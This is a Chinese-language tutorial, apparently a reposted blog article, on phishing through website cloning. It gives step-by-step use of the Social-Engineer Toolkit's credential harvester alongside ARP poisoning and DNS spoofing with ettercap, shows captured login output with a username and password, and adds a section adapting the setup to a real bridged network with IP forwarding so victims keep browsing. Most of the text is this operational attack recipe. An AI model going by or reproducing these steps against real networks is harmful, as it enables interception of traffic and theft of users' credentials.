社会工程学攻击案例-网站钓鱼
社會工程學攻擊案例-網站釣魚
滲透攻擊原理
攻擊機與其他主機在同一局域網內,通過 ARP 欺騙使其他主機的流量都經過攻擊機,有選擇性的抓取數據包,例如攻擊者想要竊取用戶登錄百度網站的信息,采取克隆站點的方式,來強制引導用戶主機的流量。 該攻擊方式需要執行以下三個步驟:
1、ARP 欺騙
2、域名劫持
3、網站克隆
BT5實現
1、啟動社會工程學攻擊集
root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set2、選擇網頁攻擊
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 10) Update the Metasploit Framework 11) Update the Social-Engineer Toolkit 12) Help, Credits, and About 99) Exit the Social-Enginee r Toolkit Select from the menu: set>23、選擇賬號竊取
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Create or im port a CodeSigning Certificate 99) Return to Main Menu set: webattack > 34、選擇克隆站點
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack > 25、開始克隆
set:webattack > Enter the url to clone: http://10.10.10.129/signin.html Press {return} to continue.6、靶機測試
之后再靶機上用瀏覽器輸入 http://10.10.10.131,并填寫登陸用戶名和密碼
7、賬號獲取
[*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: username=admin POSSIBLE PASSWORD FIELD FOUND: password=dvssc@admin01 POSSIBLE USERNAME FIELD FOUND: Login=LoginKali Linux實現
一、域名劫持(域名欺騙)ettercap
1、啟動 ettercap
ettercap -G2、主機掃描
3、ARP欺騙
此時去靶機 ARP 表查看是否毒化。
4、流址抓包
5、DNS欺騙
編輯 DNS 劫持內容
開啟 DNS 欺騙泛洪
雙擊此模塊則開啟,再雙擊則關閉
PC 上測試 DNS 欺騙
二、網站克隆
1、啟動 SET(路徑與 BT5 不同)
cd /usr/share/set ./setookit
2、選項1,社會工程學攻擊
3、選項2,網頁欺騙攻擊
4、選觀3,網頁克隆攻擊
5、選項2,單個站點克隆
6、輸入攻擊機的 IP 地址
7、輸入克隆的網頁地址
8、開始克隆網頁(開啟 apache)
若 Apache 服務默認沒有開,這里會提示是否開始,選擇y;
肉雞訪問本地IP地址,則訪問的是一個虛假的 home.51cto.com,當肉雞往這個頁面填寫如用戶名和密碼的時候,則可以被我們發現。
三、在靶機上測試效果
1、靶機能夠 ping 通攻擊者的 IP 地址
2、靶機瀏覽器輸入攻擊者的 IP 地址
3、靶機上輸入用戶名和密碼
4、點擊登陸之后會進入真實的網頁
這個是真實頁面,但是剛才點擊登陸的時候,密碼已經被截獲
5、打開攻擊者緩存文件查看用戶密碼
真實環境實現(Kali 橋接)
VMware模式:橋接模式/NAT模式
修改 IP 和路由(一次性)
ifconfig eth0 192.168.199.87 netmask 255.255.255.0 up //設置IP地址 route add default gw 192.168.199.1 //添加默認路由修改 IP 和路由(永久性)
vim /etc/network/interfacesauto eth0 allow-hotplug eth0 iface eth0 inet static address 10.1.1.212 netmask 255.255.255.0 gateway 10.1.1.254為了使被攻擊機被欺騙后仍可正常上網,需要添加路由轉發功能
root@PL-kali:# vim /etc/sysctl.conf # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1 //將前面的注釋#刪掉,并重啟機器reboot修改DNS服務器
root@PL-kali:~# vim /etc/resolv.confnameserver 223.5.5.5剩余操作和虛擬環境下相同。
總結
以上是生活随笔為你收集整理的社会工程学攻击案例-网站钓鱼的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 利用 Django 动态展示 Pyech
- 下一篇: 【JZOJ 4623】搬运干草捆